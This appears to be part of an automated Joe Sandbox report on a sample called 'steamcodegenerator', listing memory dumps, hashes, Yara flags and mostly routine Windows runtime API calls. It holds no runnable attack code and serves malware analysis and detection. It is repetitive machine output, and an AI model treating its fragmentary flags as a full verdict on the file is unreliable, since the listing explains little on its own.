                                                                        • Opcode Fuzzy Hash: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                        • Instruction Fuzzy Hash: 60123422B18681CAFB28CB65D8423FD6371AB55788F444131DE4DABB9ADF3CE565C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                        • String ID:
                                                                        • API String ID: 2933794660-0
                                                                        • Opcode ID: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                        • Instruction ID: ff304e01ce83314a87cdb20be244b4c5083aa8c57962569ab58408ac636683ae
                                                                        • Opcode Fuzzy Hash: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                        • Instruction Fuzzy Hash: A7111F22B14F06C9EB00DF61E8562A933B4F759758F440931EA6D97764DF78D1548340
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                        • API String ID: 3215553584-2761157908
                                                                        • Opcode ID: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                        • Instruction ID: 354569c4c8186f84818df684c5b5acd4bb155f0a4c05f6d96b8241ad26e926c0
                                                                        • Opcode Fuzzy Hash: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                        • Instruction Fuzzy Hash: 4E7103B2E18242CAE7258F66D4527BD66B1AB82794F004635DA1DEFBD5DE3CF9408B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1502251526-0
                                                                        • Opcode ID: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                        • Instruction ID: 9cab9932bcc3373fa5fcbf709fdcc525b03dcc35a2359ff31f6655459e01af5e
                                                                        • Opcode Fuzzy Hash: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                        • Instruction Fuzzy Hash: CEC1E3B2B18286C7EB248F19E04566AB7B1F784BA4F468134DB4A9B744DF3DF811CB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 1791019856-0
                                                                        • Opcode ID: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                        • Instruction ID: 8f33312c174ea9138918b28179886efe106a5c8f2c2aae455c8b626b321b1371
                                                                        • Opcode Fuzzy Hash: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                        • Instruction Fuzzy Hash: AC6180B2A08682CAEB349F12D5622B973B1FB95750F048135CB5EEB7A1DE3CE495C700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -$e+000$gfff
                                                                        • API String ID: 0-2620144452
                                                                        • Opcode ID: 798b48c96635f930ac666b1b5a48e237ac275f191e21e12dc5bb9441e7330c16
                                                                        • Instruction ID: bab8618ff5d6b0e53da6e8d78e1ad5a702c4bb7b50c5c59f86044478b1f3b435
                                                                        • Opcode Fuzzy Hash: 798b48c96635f930ac666b1b5a48e237ac275f191e21e12dc5bb9441e7330c16
                                                                        • Instruction Fuzzy Hash: 0A5158B2B182D586E7648E35D8067697BA1E785BA4F488231CBAC9FBD1DF3DE440C701
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: GetLocaleInfoEx
                                                                        • API String ID: 2299586839-2904428671
                                                                        • Opcode ID: 415bcb294c056d98af3462750d7d188cc4b1afdd892eeae8a2ee088bcffb3ecf
                                                                        • Instruction ID: 464c361d8b242e019a75c800d554d7e461c7368b423b11eca8e016924ad658de
                                                                        • Opcode Fuzzy Hash: 415bcb294c056d98af3462750d7d188cc4b1afdd892eeae8a2ee088bcffb3ecf
                                                                        • Instruction Fuzzy Hash: 4201A720B08A81C5E7409B47B8050AAB3B0EF85BD0F548036EE5DBBB65CE3CF5418340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-0
                                                                        • Opcode ID: 5941f4e66f4a4ae4ea8d9f2ce51bef13bf4df362b0d1e962feb6320bd1209b36
                                                                        • Instruction ID: 989953ef61efd0282c08b3a2f9b4a33deca3e31760f86b11cde2802b8f92e0c8
                                                                        • Opcode Fuzzy Hash: 5941f4e66f4a4ae4ea8d9f2ce51bef13bf4df362b0d1e962feb6320bd1209b36
                                                                        • Instruction Fuzzy Hash: 84128872A08BC1C6E751CF2894462F973A4FB69758F059235EE9D9B792EF38E194C300
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ce188c6723de416a60445d936ccf2b71249bd4acdd477d6696f92839183b5057
                                                                        • Instruction ID: 94a7371d687d6e033f12f7def6ff9044cca38949486d08126727ee8082b2b551
                                                                        • Opcode Fuzzy Hash: ce188c6723de416a60445d936ccf2b71249bd4acdd477d6696f92839183b5057
                                                                        • Instruction Fuzzy Hash: 29E14F32A04B81C6E720DB61E4416EE67B4FB95798F404635DF8EA7B56EF78E245C300
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f8fdce93d0982d34daabacb749a03f63f2871ed28a5675a9677f348b7d655c88
                                                                        • Instruction ID: ef5b2eda8ae6a2087b0053ac83a7085df0af259060de205dcf4d2f47e0569417
                                                                        • Opcode Fuzzy Hash: f8fdce93d0982d34daabacb749a03f63f2871ed28a5675a9677f348b7d655c88
                                                                        • Instruction Fuzzy Hash: 0C51B222B08691C5FB209B72A8455AE7BB1FB457A4F144235EE5DBBBA9DE3CD401C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 673564084-0
                                                                        • Opcode ID: 4c183c7ee8845e7f1e29b7170d50f5209d966a7f82c8ce190a7d309a0b29ac7e
                                                                        • Instruction ID: c15c62143dae59d6a0a24b3340f01526ee64fd447d790cf5d6184777d5a0e35b
                                                                        • Opcode Fuzzy Hash: 4c183c7ee8845e7f1e29b7170d50f5209d966a7f82c8ce190a7d309a0b29ac7e
                                                                        • Instruction Fuzzy Hash: 5731C472A08682C6EB648B22E4523BA73B0FB45740F544134DA4EEB7A5DF3CE4548700
                                                                        APIs
                                                                          • Part of subcall function 00007FF66355A298: GetLastError.KERNEL32 ref: 00007FF66355A2A7
                                                                          • Part of subcall function 00007FF66355A298: FlsGetValue.KERNEL32 ref: 00007FF66355A2BC
                                                                          • Part of subcall function 00007FF66355A298: SetLastError.KERNEL32 ref: 00007FF66355A347
                                                                        • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF663564627,?,00000000,00000092,?,?,00000000,?,00007FF663556B25), ref: 00007FF663563ED6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystemValue
                                                                        • String ID:
                                                                        • API String ID: 3029459697-0
                                                                        • Opcode ID: 01ec781091376c7859fee142802df2496de0f58f2f8dfee6d425d5d006462899
                                                                        • Instruction ID: 31e15cc4571264136afc9c60ca99dcb511e4a8873a74e388b48ea001b498caa9
                                                                        • Opcode Fuzzy Hash: 01ec781091376c7859fee142802df2496de0f58f2f8dfee6d425d5d006462899
                                                                        • Instruction Fuzzy Hash: C511E167A08645CAEB158F16D8816BD7BB0FB81FA0F448135C62A9B3F0CE78D9D1C750
                                                                        APIs
                                                                          • Part of subcall function 00007FF66355A298: GetLastError.KERNEL32 ref: 00007FF66355A2A7
                                                                          • Part of subcall function 00007FF66355A298: FlsGetValue.KERNEL32 ref: 00007FF66355A2BC
                                                                          • Part of subcall function 00007FF66355A298: SetLastError.KERNEL32 ref: 00007FF66355A347
                                                                        • GetLocaleInfoW.KERNEL32(?,?,?,00007FF66356419A), ref: 00007FF663564427
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocaleValue
                                                                        • String ID:
                                                                        • API String ID: 3796814847-0
                                                                        • Opcode ID: 5447dec9b86e6f2ea6977062d9d6cdf6f0dba6f956cb56fba477a354d03ee583
                                                                        • Instruction ID: 2217ffefd5ca119f3eb26ff587e72ec52c50f5c97bb060bbbb97ce13548a26ff
                                                                        • Opcode Fuzzy Hash: 5447dec9b86e6f2ea6977062d9d6cdf6f0dba6f956cb56fba477a354d03ee583
                                                                        • Instruction Fuzzy Hash: 8D117A72F18512C3E7748B27A05367E23B1EB45761F144231D66DAB7D4DE29D8818700
                                                                        APIs
                                                                          • Part of subcall function 00007FF66355A298: GetLastError.KERNEL32 ref: 00007FF66355A2A7
                                                                          • Part of subcall function 00007FF66355A298: FlsGetValue.KERNEL32 ref: 00007FF66355A2BC
                                                                          • Part of subcall function 00007FF66355A298: SetLastError.KERNEL32 ref: 00007FF66355A347
                                                                        • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6635645E3,?,00000000,00000092,?,?,00000000,?,00007FF663556B25), ref: 00007FF663563F86
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystemValue
                                                                        • String ID:
                                                                        • API String ID: 3029459697-0
                                                                        • Opcode ID: 34d94b69e6205fce2f74fcc9f7c432e85abed7b203d1d4e603842b48bd0e59d7
                                                                        • Instruction ID: 8b8fdddddd503d1efcccd98a721aeb267e9ee16b9f455bf8a7f4bfe31d532a90
                                                                        • Opcode Fuzzy Hash: 34d94b69e6205fce2f74fcc9f7c432e85abed7b203d1d4e603842b48bd0e59d7
                                                                        • Instruction Fuzzy Hash: B5019272E08282C6EB104B17E8417B9B6B5EB51BA4F459232E6299B3E5DF7D94818700
                                                                        APIs
                                                                        • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF66355B7C7,?,?,?,?,?,?,?,?,00000000,00007FF663563488), ref: 00007FF66355B3C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2099609381-0
                                                                        • Opcode ID: cff3fbf4e0a8c1f2ed818e2cbe172fd1e753f0025c3aa3cb7564e8ccb7c4537e
                                                                        • Instruction ID: c3fcdfeb60b41d4026b0e4c3cd188970f2ddf1822389934ff9c5f16fc018522d
                                                                        • Opcode Fuzzy Hash: cff3fbf4e0a8c1f2ed818e2cbe172fd1e753f0025c3aa3cb7564e8ccb7c4537e
                                                                        • Instruction Fuzzy Hash: B7F03C72B08B45C3E704DB19F8921AA23B1FB99780F549035EA4DEB365CE3CE5518740
                                                                        APIs
                                                                        • GetLastError.KERNEL32 ref: 00007FF66355F0AD
                                                                          • Part of subcall function 00007FF663558A7C: HeapAlloc.KERNEL32(?,?,00000000,00007FF66355A472,?,?,00001E36F50DF55B,00007FF663554851,?,?,?,?,00007FF66355F7CA,?,?,00000000), ref: 00007FF663558AD1
                                                                          • Part of subcall function 00007FF663558AF4: HeapFree.KERNEL32(?,?,00007FF663557CF3,00007FF6635628CA,?,?,?,00007FF663562C47,?,?,00000000,00007FF663563185,?,?,?,00007FF6635630B7), ref: 00007FF663558B0A
                                                                          • Part of subcall function 00007FF663558AF4: GetLastError.KERNEL32(?,?,00007FF663557CF3,00007FF6635628CA,?,?,?,00007FF663562C47,?,?,00000000,00007FF663563185,?,?,?,00007FF6635630B7), ref: 00007FF663558B14
                                                                          • Part of subcall function 00007FF66356641C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF66356644F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 916656526-0
                                                                        • Opcode ID: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                        • Instruction ID: 0bd24aae8db559960410b3980dc5355edb5d7daf9a982c6569c3d250bf1966f9
                                                                        • Opcode Fuzzy Hash: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                        • Instruction Fuzzy Hash: 9F41A431B19683C2FA609A26E9537BAA2F16F857A0F445535EE4DEF785EE3CF4018700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
                                                                        • Instruction ID: 9f2fd52a1f978f875cca2e43d208abe5a9f4f7e311be2286eb7017636e3148fa
                                                                        • Opcode Fuzzy Hash: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
                                                                        • Instruction Fuzzy Hash: BCB09221E0BB46C2EA486B526C8321422B4BF58710F988038D14CAA320EE2C20A54701
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
                                                                        • Instruction ID: 6832a3cc0b25633fabd8739102348b4cd50d0f29daa53c2fc1513d6c4ea8771d
                                                                        • Opcode Fuzzy Hash: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
                                                                        • Instruction Fuzzy Hash: E4E17730718A499BDB68DF78C8897EEB7E5FB98705F00422DD94AC3640DF35E9158B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                        • Instruction ID: e5128584c48c94cc193d20cc1e8ab6d0d5803c71700cd984fddd846d9f5e6c43
                                                                        • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                                        • Instruction Fuzzy Hash: 14D16E31608A088FDB59DF28C889AEAB7E1FF98310F14462DE88BC7555EF35E541CB42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 4023145424-0
                                                                        • Opcode ID: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
                                                                        • Instruction ID: 11a8eebbe1c8164429367d1ae29fe667ac77e80691331572c64d65a11170b572
                                                                        • Opcode Fuzzy Hash: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
                                                                        • Instruction Fuzzy Hash: 96C18F76A087C2C5EB609B6194123BA67B0FB947A8F409035DE4EEBB95EE3CF545C700
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
                                                                        • Instruction ID: f1c9ceb76c4231ec576588219ea0dab8064ec533796095be78048196278711e8
                                                                        • Opcode Fuzzy Hash: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
                                                                        • Instruction Fuzzy Hash: 24C1A032A08646C6EF68CF26C45167D2BB0EB45B68F144235CE1DABB95DF39FA41C740
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
